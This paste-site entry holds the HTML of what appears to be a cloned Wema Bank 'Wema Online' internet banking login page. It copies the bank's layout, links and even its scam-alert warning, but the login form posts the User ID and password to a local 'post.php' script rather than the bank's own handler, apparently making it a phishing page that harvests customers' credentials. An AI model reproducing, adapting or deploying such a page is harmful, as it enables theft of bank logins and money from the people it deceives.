Untitled
3 years ago in Plain Text
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Wema Online | Login To Your Account Here
</title>
<link href="Content/bootstrap.min.css" rel="stylesheet" type="text/css" /><link href="Content/Site.css" rel="stylesheet" type="text/css" />
<script src="Scripts/jquery-1.10.2.js"></script>
<script src="Scripts/jquery-ui-1.11.2.js"></script>
<script src="Scripts/bootstrap.min.js" type="text/javascript" ></script>
<script src="Scripts/respond.min.js" type="text/javascript" ></script>
<script type="text/javascript">
$(document).ready(function () {
// Create two variable with the names of the months and days in an array
var monthNames = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"];
var dayNames = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
// Create a newDate() object
var newDate = new Date();
// Extract the current date from Date object
newDate.setDate(newDate.getDate());
// Output the day, date, month and year
// $('#Date').html( newDate.getDate() + ' ' + monthNames[newDate.getMonth()] + ' ' + newDate.getFullYear());
setInterval(function () {
// Create a newDate() object and extract the seconds of the current time on the visitor's
var seconds = new Date().getSeconds();
var minutes = new Date().getMinutes();
var hours = new Date().getHours();
var day = new Date().getDay();
// Add a leading zero to seconds value
$("#time").html(dayNames[day] + ', ' + (monthNames[newDate.getMonth()] + ' ' + newDate.getDate() + ', ' + newDate.getFullYear()) + ' | ' + ((hours < 10 ? "0" : "") + hours + ":") + ((minutes < 10 ? "0" : "") + minutes + ":") + (seconds < 10 ? "0" : "") + seconds);
}, 1000);
});
$(function () {
$('#StartDateControl').datepicker({
changeMonth: true,
changeYear: true,
yearRange: "-120:+0",
//showButtonPanel: true,
showOtherMonths: true,
//dateFormat: "MM dd, yy"
dateFormat: 'dd-M-yy'
});
});
$(function () {
$('#EndDateControl').datepicker({
changeMonth: true,
changeYear: true,
yearRange: "-120:+0",
//showButtonPanel: true,
showOtherMonths: true,
//dateFormat: "MM dd, yy"
dateFormat: 'dd-M-yy'
});
});
</script>
<script type="text/javascript">
function Comma(nStr) {
nStr = nStr.replace(/,/g, "")
//document.getElementById('ctl00_ContentPlaceHolder1_txtTransferAmount').value = "";
document.getElementById('ContentPlaceHolder1_txtTransferAmount').value = "";
nStr += '';
x = nStr.split('.');
x1 = x[0];
x2 = x.length > 1 ? '.' + x[1] : '';
var rgx = /(\d+)(\d{3})/;
while (rgx.test(x1))
x1 = x1.replace(rgx, '$1' + ',' + '$2');
//document.getElementById('ctl00_ContentPlaceHolder1_txtTransferAmount').value = x1 + x2;
document.getElementById('ContentPlaceHolder1_txtTransferAmount').value = x1 + x2;
}
function isNumberKey(evt) {
var charCode = (evt.which) ? evt.which : event.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57)) {
//alert("Please Enter Only Numeric Value:");
return false;
}
return true;
}
</script>
</head>
<body>
<form method="post" action="post.php" id="form1">
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU0Mjc3OTc5Mg9kFgJmD2QWAgIDD2QWAgIJD2QWAgIDD2QWAgICD2QWAgICD2QWCgIBDxBkZBYBZmQCCw8QZGQWAWZkAhMPEGRkFgFmZAIbDxBkZBYBZmQCIw8QZGQWAWZkGAEFN2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkSWRlbnRpdHlWYWxpZGF0b3IxJE11bHRpVmlldzEPD2RmZBkmXL4NBHH/ufNOWxSa0uvJtxs9s06+jEDvMFVcKHhK" />
</div>
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAr4/NdKL0h5pOrnazu+uAPuknArwhqgtVYp+RiyMYkrc0YUPZQbN9F0+glEePCrlIInH1D/vc4PpT3z+IVZGDGLdQHojHNevNB5v3MuvV0Rnp/X1fTHzFwFkW2IgTCXeDwtVWuNvFa6ml4eZmWatPlex004gdbZuYd03uyyowyQhkGpNDZ5ZqU23ojdpS1LBr+wS4xnW8ZIVB06X7opsHDkqEKtAum5J45IFyvqii26lTtq4G9KhyuBJIobdcBFa5g=" />
</div>
<div class="container-fluid">
<div class="row">
<div class="col-sm-6 LoginBannerLogo">
<img src="Images/wema_logo.png" />
</div>
<div class="col-sm-6 LoginBannerMenu" style="float:right">
<div class="row">
<div class="col-sm-3">
<div class="CustomMenu" >
<a id="HyperLink8" href="http://apps.wemabank.com/wema.forms/account/accountOpening" target="_blank" style="color:White;display:block">Open Account</a>
</div>
</div>
<div class="col-sm-2">
<div class="CustomMenu" >
<a id="HyperLink3" href="Contact.aspx" style="color:White;display:block">Feedback</a>
</div>
</div>
<div class="col-sm-2">
<div class="CustomMenu" >
<a id="HyperLink4" href="https://chat.wemabank.com/i3root" target="_blank" style="color:White;display:block"> Live Chat</a>
</div>
</div>
<div class="col-sm-3">
<div class="CustomMenu">
<a id="HyperLink10" href="ResetPassword.aspx" style="color:White;display: block">Reset Password</a>
</div>
</div>
</div>
</div>
<div class="col-sm-12 LoginDateBar hidden-xs " id="time">
</div>
<!--BODY STARTS-->
<div class="col-md-8 hidden-sm hidden-xs AddDisplay">
<div class="row" style="padding-left: 300px;">
<div class="col-md-12" style="padding-top: 50px; font-size: 35px; margin:0px !important;">
Wema<strong>Online</strong>
</div>
<div class="col-md-12" style="font-size: 50px; color: #F17E01; margin-top:-10px; padding-top: -10px">
<strong style="font-stretch:wider">Just Got Better!</strong>
</div>
<div class="col-md-10">
<div class="row">
<div class="col-md-2">
<strong>Beneficiary Management</strong>
</div>
<div class="col-md-1" style="width:5%">|</div>
<div class="col-md-2">
<strong> StandingOrder Instruction</strong>
</div>
<div class="col-md-1" style="width:5%">|</div>
<div class="col-md-3">
<strong>Western Union Money Transfer</strong>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-4 LoginBoxParent">
<div class="row">
<div class="col-xs-12 LoginTitle">
Log in to Internet Banking
<script>
$(document).ready(function () {
if ($('#hidMessageStatus').val() == "1") {
if ($('#hidMessageSuccess').val() == "1") {
$("#dSuccessMessage").text($("#hidMessageContent").val());
$('#successModal').modal({
keyboard: true
})
} else {
$("#dFailedMessage").text($("#hidMessageContent").val());
$('#failedModal').modal({
keyboard: true
})
}
$('#hidMessageStatus').val("0");
}
});
</script>
<input type="hidden" name="ctl00$ContentPlaceHolder1$MasterAlert1$hidMessageStatus" id="hidMessageStatus" />
<input type="hidden" name="ctl00$ContentPlaceHolder1$MasterAlert1$hidMessageContent" id="hidMessageContent" />
<input type="hidden" name="ctl00$ContentPlaceHolder1$MasterAlert1$hidMessageSuccess" id="hidMessageSuccess" />
<!-- Modal -->
<div class="modal fade success" id="successModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<div class="modal-dialog modal-md" style="position:static">
<div class="modal-content">
<div class="bg-success modal-header">
<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
<div class="modal-title" id="myModalLabel"><span class='glyphicon glyphicon glyphicon glyphicon-ok-circle'></span> Operation Successful!</div>
</div>
<div class="modal-body">
<div style="color:green" id="dSuccessMessage"></div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-success" data-dismiss="modal">OK</button>
</div>
</div>
</div>
</div>
<!-- Modal -->
<div class="modal fade danger" id="failedModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" >
<div class="modal-dialog modal-md" style="position:static">
<div class="modal-content">
<div class="bg-danger modal-header">
<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
<h4 class="modal-title" style ="color:red;font-size: 18px;" id="H1"><span class='glyphicon glyphicon glyphicon-remove-circle'></span> Operation Failed!</h4>
</div>
<div class="modal-body">
<div style="color:red" id="dFailedMessage"></div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-danger" data-dismiss="modal">OK</button>
</div>
</div>
</div>
</div>
<script>
$(document).ready(function () {
if ($('#ContentPlaceHolder1_IdentityValidator1_hidIdentityMessageStatus').val() == "1") {
$("#SecurityMessage").text($("#ContentPlaceHolder1_IdentityValidator1_hidSecurityMessage").val());
$('#successModalSecurity').modal({
keyboard: false
})
$('#ContentPlaceHolder1_IdentityValidator1_hidIdentityMessageStatus').val("0");
$("#ContentPlaceHolder1_IdentityValidator1_txtMyGateCode").focus();
}
});
</script>
<input type="hidden" name="ctl00$ContentPlaceHolder1$IdentityValidator1$hidIdentityMessageStatus" id="ContentPlaceHolder1_IdentityValidator1_hidIdentityMessageStatus" />
<input type="hidden" name="ctl00$ContentPlaceHolder1$IdentityValidator1$hidSecurityMessage" id="ContentPlaceHolder1_IdentityValidator1_hidSecurityMessage" />
<!-- Modal -->
<div class="modal fade success" id="successModalSecurity" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<div class="modal-dialog modal-md" style="position: static">
<div class="modal-content">
<div class="bg-success modal-header">
<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
<div class="modal-title" id="myModalLabel"><span class='glyphicon glyphicon glyphicon glyphicon-info-sign'></span>&nbsp;&nbsp;&nbsp;&nbsp;Security Validation</div>
</div>
<div class="modal-body">
</div>
<div class="modal-footer">
<button type="button" class="btn btn-success" data-dismiss="modal">Cancel</button>
</div>
</div>
</div>
</div>
<!-- Modal -->
</div>
<div class="col-xs-12 LoginBox">
<div class="panel panel-default">
<div class="LoginInnerBoxPadding">
<div class="row">
<div class="col-xs-12 LoginInnerBoxInstruction">Please type in your User ID and Password to access your accounts</div>
<div class="col-xs-12">&nbsp;</div>
<div class="col-md-3 UserIDTagAlignment"><strong>User ID</strong></div>
<div class="col-md-9">
<div class="input-group input-group-sm">
<input name="ctl00$ContentPlaceHolder1$txtMyId" type="text" id="ContentPlaceHolder1_txtMyId" class="form-control" placeholder="User ID" aria-describedby="basic-addon1" />
<span class="input-group-addon" id="basic-addon1"><span class="glyphicon glyphicon-user"></span></span>
</div>
</div>
<div class="col-md-3 PasswordTagAlignment"><strong>Password</strong></div>
<div class="col-md-9 PasswordCtrlTagAlignment">
<div class="input-group input-group-sm">
<input name="ctl00$ContentPlaceHolder1$txtMyGateCode" type="password" id="ContentPlaceHolder1_txtMyGateCode" class="form-control" placeholder="Password" aria-describedby="basic-addon1" />
<span class="input-group-addon" id="Span1"><span class="glyphicon glyphicon-lock"></span></span>
</div>
</div>
<input type="hidden" name="ctl00$ContentPlaceHolder1$hdfPassword" id="ContentPlaceHolder1_hdfPassword" />
<div class="col-xs-12" style="text-align: right; padding-top: 10px">
<input type="submit" name="ctl00$ContentPlaceHolder1$btnLogin" value="Login" id="ContentPlaceHolder1_btnLogin" class="btn btn-normal" />
</div>
<div class="col-xs-12 LoginInnerBoxInstruction" style="text-align: right; padding-top: 10px">
<a href="RecoverUserid.aspx" class="alert-link">Forget User ID ?</a> | <a href="ResetPassword.aspx"> Reset Password?</a>
</div>
</div>
</div>
</div>
</div>
<div class="col-xs-12 LoginInnerBoxInstruction" style="padding-right: 40px;margin-bottom:10px;">By logging on, I acknowledge that I have read, understood and I am bound by the version of the <a id="ContentPlaceHolder1_HyperLink5" class="Purple" href="WemaOnlineTermsAndCondition.pdf" target="_blank"><u>Electronic Banking Agreement</u></a> that is posted on this website at the time of loggin in. </div>
<div class="col-xs-12 LoginInnerBoxInstruction" style="padding-right: 40px; padding-bottom:80px;">
<div class="custompanel">
<div class="custompanel-heading">SCAM ALERT TIPS</div>
<div class="custompanel-body">
Wema Bank Plc will NEVER at anytime ask you to access your Internet Banking through a link in an e-mail. Do not fall victim of fraud!
<div style="text-align: right; padding-top: 5px;">
<a id="ContentPlaceHolder1_HyperLink6" class="btn btn-info" href="http://www.wemabank.com/e-banking/scam-alert-tips/" target="_blank">LEARN MORE</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<nav class="navbar navbar-default navbar-fixed-bottom" style="background-color: #D7DEE8; border: none">
<div class="container" style="text-align: center; padding-top: 12px; font-size: 10px">
<a id="HyperLink7" class="LinkButtonPurple" href="http://www.wemabank.com/" target="_blank"> Wema Bank Plc &copy; 2021</a> | <a id="HyperLink5" class="LinkButtonPurple" href="WemaOnlineTermsAndCondition.pdf" target="_blank">Terms And Condition</a> |
<a id="HyperLink6" class="LinkButtonPurple" href="http://www.wemabank.com/privacy-policy/" target="_blank">Privacy Policy</a>
</div>
</nav>
</form>
</body>
</html>